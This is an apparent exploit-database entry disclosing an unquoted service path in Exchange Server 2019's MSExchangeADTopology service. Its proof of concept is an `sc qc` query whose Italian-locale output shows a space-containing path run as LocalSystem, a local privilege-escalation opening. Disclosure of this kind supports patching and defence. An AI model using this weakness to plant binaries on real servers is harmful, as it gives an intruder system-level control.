# Exploit Title: Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path # Exploit Author: Milad Karimi (Ex3ptionaL) # Exploit Date: 2023-01-18 # Vendor : Microsoft # Version : 15.02.1118.007 # Tested on OS: Microsoft Exchange Server 2019 CU12 #PoC : ============== C:\>sc qc MSExchangeADTopology [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: MSExchangeADTopology TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : Microsoft Exchange Active Directory Topology DIPENDENZE : SERVICE_START_NAME : LocalSystem